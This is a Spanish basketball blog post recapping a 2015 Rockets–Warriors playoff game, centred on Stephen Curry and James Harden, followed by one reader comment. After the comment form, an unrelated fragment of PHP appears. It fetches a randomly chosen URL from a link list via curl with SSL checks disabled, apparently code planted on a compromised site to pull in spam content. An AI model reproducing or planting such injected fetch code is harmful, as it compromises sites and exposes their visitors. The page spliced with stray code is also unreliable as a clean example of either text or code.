La Crónica: Monumento al basket

22 de May de 2015 por txusma

Con semejantes escultores lo más normal es que cada partido se convierta en un monumento. El duelo entre el MVP de la temporada, Stephen Curry, y el otro principal candidato al galardón, James Harden, fue épico, de poder a poder. Individualmente tal vez el combate se lo llevó Harden a los puntos pero los Warriors fueron los que se alzaron con la victoria.

Houston Rockets 98 – Golden State Warriors 99

A pesar de lo que indicaban las primeras informaciones, Dwight Howard saltó a la cancha con el quinteto inicial y lo cierto es que jugó un buen partido pero no nos desviemos más de lo que ha de ser el foco central de esta crónica: el duelo cara a cara entre los 2 mejores jugadores de la temporada 2014/2015 (Lebron James mediante). Stephen Curry golpeó primero con un primer cuarto  en el que anotó 15 puntos aprovechándose de los despistes defensivos de los visitantes pero éstos se las arreglaron para salir vivos a pesar de los 36 puntos que anotaron los Warriors. En el segundo cuarto la diferencia no dejó de aumentar y un parcial de 8-o dejó la diferencia en 17 puntos. Ahí tocó techo, justo en el momento en que James Harden volvía a la pista tras unos merecidos minutos de descanso. Bajo su liderato (autor de 12 puntos, 5 rebotes, 3 asistencias, 1 robo y 1 tapón en apenas 7 minutos y medio) los Rockets empataron el partido antes del de descanso a unos Warriors que parecían haberse quedado KO por momentos. 

En la reanudación, Houston aprovechó la inercia y llegó a escaparse de 6 puntos pero rápidamente los locales se quitaron el sueño de las orejas e igualaron el marcador. Así se llegó a los últimos minutos de partidos, con los Warriors por delante pero nunca ganando de más de 4 puntos. A falta de 3 minutos los Warriors parecieron romper la baraja definitivamente al escaparse de 8 puntos tras  una canastón de Stephen Curry sobre un Terrence Jones que aún intenta puntuarle el tiro pero nada más lejos de la realidad. En la jugada siguiente, Harden sube la pelota se aprovecha de un bloqueo de Howard sobre Klay Thompson y enchufa un triple que enfría y silencia todo el Oracle Arena en cuestión de segundos. Turno de Curry: asistencia a Andrew Bogut que anota una bandeja en falta y nuevo canastón de nuevo sobre Terrence Jones que vuelve a poner a los Warriors 8 arriba a falta de minuto y medio. Cualquier otro equipo habría bajado los brazos pero no estos Rockets. James Harden anotó los 6 puntos siguientes y asistió a Howard, tras una recuperación producto de una gran defensa de Corey Brewer y Terrence Jones sobre Curry, para que pusiera a los suyos a sólo un punto a falta de 33 segundos. Los Warriors fueron incapaces de anotar tras un tiempo muerto y James Harden se hizo con el control de la pelota a falta de 8 segundos. Esa fue la jugada clave del partido. Subió el balón rápidamente y al encontrarse con Curry y Thompson pasó el balón a Howard que estaba en la frontal más allá de la línea de 3. Éste le devolvió el balón y Harden se metió de lleno en la trampa de los Splash Brothers. No pudo salir de ella y acabó perdiendo el balón sin haber intentado el tiro siquiera. Esta vez lo que fue clutch no fue un tiro sinó una acción defensiva. Esto también es baloncesto.

Comenta

Un comentario a esta entrada

  1. Ruxixón dice:
    #1

    Esperando la vendetta de Harden…nadie contaba con Houston y están demostrando en estas finales de conferencia que no desmerecen para nada la plaza.Ya si se personaliza en el duelo individual pues una gozada,a pesar de lo mal que pueda caer el barbas,pero es que es la leche de bueno.Y ni hablar del 30…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>